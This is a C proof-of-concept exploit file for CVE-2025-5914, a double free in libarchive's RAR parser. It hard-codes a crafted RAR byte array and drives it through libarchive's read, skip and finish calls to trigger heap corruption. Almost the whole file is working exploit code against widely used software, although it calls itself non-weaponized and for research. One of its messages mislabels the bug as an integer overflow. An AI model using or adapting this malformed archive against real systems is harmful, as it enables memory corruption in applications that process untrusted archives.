
/*
* CVE-2025-5914 - Parser-Induced Ownership Confusion in libarchive RAR Parsing
*
* Author: Byte Reaper (Bytrep Security Research)
* Target: libarchive < 3.8.0
* Root Cause: Lifetime violation / ownership confusion
* Primitive: Double Free
* Impact: Heap corruption via overlapping objects
*
* Description:
* This proof-of-concept demonstrates a parser-driven ownership confusion
* in libarchive's RAR handling logic, resulting in a double free condition.
* The PoC reproduces the bug and validates the underlying memory corruption
* primitive without weaponization.
*
* Environment:
* - Tested on: Linux (kernel 6.10.14, REMnux)
* - Dependency: libarchive-dev
*
* Disclaimer:
* For educational and security research purposes only.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <archive.h>
#include <archive_entry.h>

void sys_exit(void)
{
    __asm__ volatile
    (
        "mov $0xE7, %%rax\n\t"
        "xor %%rdi, %%rdi\n\t"
        "syscall\n\t"
        :
        :
        : "rax",
          "rdi",
          "r11",
          "rcx",
          "memory"
    );
}
const unsigned char RAR_SIG[] =
{
    0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x00,
    0xe6, 0xd5,
    0x73,
    0x00, 0x00,
    0x0d, 0x00,
    0x30, 0x19,
    0x74,
    0x00, 0x90,
    0x1f, 0x00,
    0xff, 0xff, 0xff, 0x7f,
    0x00, 0x00, 0x00, 0x00,
    0x03,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x14,
    0x30,
    0x01, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x41
};
//TARGET FLOW LIBARCHIVE : RAR archive processing (FALLBACK,CLEANUP)
int 
trigger_double_free
(
    void
)
{
    struct archive* base_obj = NULL;
    struct archive_entry* entryArchive = NULL;
    int filter_layer = 0x0;
    int parser_format = 0x0;
    int archive_memory = 0x0;
    int read_archive = 0x0;
    uint8_t* buf = malloc(sizeof(RAR_SIG));
    if (buf == NULL)
    {
        fprintf(stderr, "[-] Error Allocation RAR SIG file !\n");
        sys_exit();
    }
    memcpy(buf, RAR_SIG, sizeof(RAR_SIG));
    base_obj = archive_read_new();
    parser_format = archive_read_support_format_all(base_obj);
    if (parser_format == ARCHIVE_FAILED)
    {
        fprintf
        (
            stderr,
            "[-] archive_read_support_format_all() : Error set filer/parser RAR (ARCHIVE_FAILED)\n"
        );
        return 0x1;
    }
    //PARSER FREE (ERROR PATH)
    printf("[+] Start RAR PARSER...\n");
    archive_memory = archive_read_open_memory
    (
        base_obj,
        buf,
        sizeof(RAR_SIG)
    );
    if (archive_memory == ARCHIVE_FATAL)
    {
        fprintf(stderr, "[-] archive_read_open_memory() : Error link buffer (ARCHIVE_FATAL) !\n");
        fprintf(stderr, "%s\n", archive_error_string(base_obj));
        sys_exit();
    }
    printf("[+] Archive Memory : ---------------\n");
    printf("[+] Size buffer : %zu (hex=%lX)\n",
        sizeof(RAR_SIG),
        sizeof(RAR_SIG));
    printf("------------------------------------\n");
    if (archive_memory <= ARCHIVE_WARN)
    {
        printf("[+] Memory Opened. Forcing Parser into vulnerable state...\n");
    }
    read_archive = archive_read_next_header(base_obj, &entryArchive);
    if (read_archive == ARCHIVE_OK)
    {
        printf("[+] Head er Accepted! Triggering Integer Overflow in Seek...\n");
        archive_read_data_skip(base_obj);
    }
    // Cleanup path triggers conflicting frees (core free)
    printf("[+] Triggering Final Free...\n");
    int core_free = archive_read_finish(base_obj);
    if (core_free == ARCHIVE_OK)
    {
        printf("[+] Core Ownership : Free Base struct (double free).");
    }
    else
    {
        printf("[-] Core Ownership : Error free base struct (Not double free) !\n");
    }
    return 0x0;
}

int 
main()
{
    printf("[+] Call main function...\n");
    trigger_double_free();
    return 0x0;
}
